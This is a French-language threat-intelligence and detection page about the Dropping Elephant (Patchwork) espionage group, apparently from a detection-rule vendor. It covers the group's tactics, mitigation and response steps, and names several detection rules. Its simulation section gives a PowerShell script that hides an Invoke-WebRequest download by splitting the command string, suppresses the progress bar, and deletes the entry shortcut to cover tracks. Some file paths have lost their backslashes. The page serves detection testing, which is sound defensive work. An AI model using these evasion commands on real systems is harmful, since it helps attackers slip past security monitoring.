APT Dropping Elephant : Tactiques d’espionnage et outils de Patchwork
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Dropping Elephant, également connu sous le nom de Patchwork, est un groupe APT axé sur l’espionnage qui cible les organisations gouvernementales et de défense. Le groupe s’appuie sur des chaînes d’attaque à plusieurs étapes impliquant des raccourcis Windows malveillants, des scripts PowerShell obfusqués et des applications Android trojanisées. Ses opérations utilisent des techniques avancées telles que le chargement latéral de DLL, des RAT résidant en mémoire et une obfuscation en couches pour maintenir la persistance et exfiltrer des données sensibles.
Enquête
Le rapport examine l’évolution des tactiques de Dropping Elephant de 2015 à 2026, y compris un récent tournant vers le chargement latéral de Windows via VLC et des outils de surveillance Android spécialisés. Il analyse plusieurs chaînes de livraison de logiciels malveillants, y compris le chargeur Donut et les charges utiles cryptées en AES-256-CBC. L’enquête documente également les techniques d’obfuscation des lignes de commande et d’injection de processus utilisées pour échapper aux contrôles de sécurité.
Atténuation
Les organisations devraient déployer une protection robuste des terminaux capable de détecter l’exécution non autorisée de PowerShell et l’activité de chargement latéral de DLL. Surveiller les tâches planifiées suspectes et la création de fichiers dans les répertoires écriturables tels que C:UsersPublic est essentiel. Appliquer des politiques strictes de contrôle des applications et une gestion des appareils mobiles peut également réduire l’exposition aux applications Android trojanisées.
Réponse
Si une activité de Dropping Elephant est détectée, les points d’extrémité Windows et Android affectés doivent être isolés immédiatement pour limiter le mouvement latéral et l’exfiltration de données supplémentaires. Les répondants devraient effectuer une analyse médico-légale de la mémoire pour identifier le code injecté et examiner les tâches planifiées pour la persistance. Une recherche plus large devrait également couvrir les fichiers LNK suspects, les DLL malveillantes et les connexions C2 non autorisées.
Flux d’Attaque
Détections
Exécution suspecte depuis le profil utilisateur public (via process_creation)
Proof of Value
Schtasks pointant vers un répertoire / binaire / script suspect (via cmdline)
Proof of Value
Tentative possible de communication de domaine de recherche d’IP (via dns)
Proof of Value
Exécution de changement de page de code inhabituelle (via cmdline)
Proof of Value
Tentative possible de chargement latéral de DLL Libvlc (via image_load)
Proof of Value
Dropping Elephant APT – Chargement de code réflexif et injection de shellcode [Windows Sysmon]
Proof of Value
Détection de script PowerShell obfusqué par Dropping Elephant APT [Windows Powershell]
Proof of Value
Exécution de simulation
Prérequis : La vérification de pré-vol de télémétrie et de base doit avoir été réussie.
Raison : Cette section détaille l’exécution précise de la technique d’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTP identifiés et viser à générer la télémétrie exacte attendue par la logique de détection. Des exemples abstraits ou non liés entraîneront un mauvais diagnostic.
-
Récit & Commandes d’attaque : L’adversaire vise à télécharger une charge utile de deuxième étape tout en minimisant l’empreinte de la commande de téléchargement. Pour échapper à la détection par de simples filtres de chaîne recherchant
Invoke-WebRequestoriwr, l’attaquant utilise la fragmentation de chaîne :iw''r. De plus, l’attaquant supprime la barre de progression pour éviter les artéfacts d’interface utilisateur qui pourraient alerter un utilisateur. Une fois la charge utile livrée et exécutée via un mécanisme de persistance basé sur un raccourci, l’attaquant supprime le raccourciGRES3001.lnkpour nettoyer les traces du point d’entrée. -
Script de test de régression :
# 1. Créez un fichier factice pour simuler la suppression du raccourci $lnkPath = "$env:USERPROFILEDownloadsGRES3001.lnk" New-Item -Path $lnkPath -ItemType File -Force # 2. Exécutez la séquence de commandes obfusquée conçue pour déclencher la règle # Cela combine le IWR fragmenté, la suppression de la progression et la suppression du fichier. powershell.exe -Command "$ProgressPreference = 'SilentlyContinue'; iw''r -Uri 'http://localhost/test.txt'; Remove-Item -LiteralPath "$env:USERPROFILEDownloadsGRES3001.lnk" -Force" -
Commandes de nettoyage :
# Supprimer les artefacts créés pendant la simulation Remove-Item -Path "$env:USERPROFILEDownloadsGRES3001.lnk" -ErrorAction SilentlyContinue